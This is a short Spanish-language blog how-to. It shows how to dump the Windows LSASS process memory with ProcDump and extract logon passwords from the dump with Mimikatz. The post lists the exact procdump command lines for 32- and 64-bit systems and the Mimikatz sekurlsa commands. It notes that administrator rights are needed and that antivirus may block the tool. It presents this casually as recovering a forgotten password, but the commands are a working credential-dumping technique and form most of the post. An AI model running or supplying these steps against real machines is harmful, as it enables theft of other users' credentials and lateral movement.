¿Como se hace?Informática Software Windows

ProcDump + Mimikatz Descubriendo contraseñas.

14 de junio de 2020 juancmmartinez

Alto! para hacer esto tienes que partir de tener ya permisos de administrador (OOOOOOOooooocchhh!).

Herramientas:

ProcDump v9.0
https://docs.microsoft.com/es-es/sysinternals/downloads/procdump
Mimikatz
http://blog.gentilkiwi.com/securite/mimikatz/minidump

Empezamos con procdump

Según Microsoft es una herramineta para el volcado de memoria y monitorizacón de aplicaciones

(ejecuta el CMD con derechos de administrador)
procdump.exe -accepteula -ma lsass.exe (Nombre fichero).dmp (32 bits)
procdump.exe -accepteula -64 -ma lsass.exe (Nombre fichero).dmp (64 bits)

El fichero lo utilizaremos con mimikatz

Mimikatz

Aviso! Mimikatz no le gusta nada al Antivirus, puede que tengas problemas con el.

mimikatz # sekurlsa::minidump (nombre fichero).dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

¿ahora recuerdas el password?

saludos monsters!

También te puede gustar

Ataques en DDOS Servidores Web

Wsus -Quitar Wsus para volver a realizar updates por internet

Añadir disco duro a una maquina virtual Linux – CentOS

Deja una respuesta Cancelar la respuesta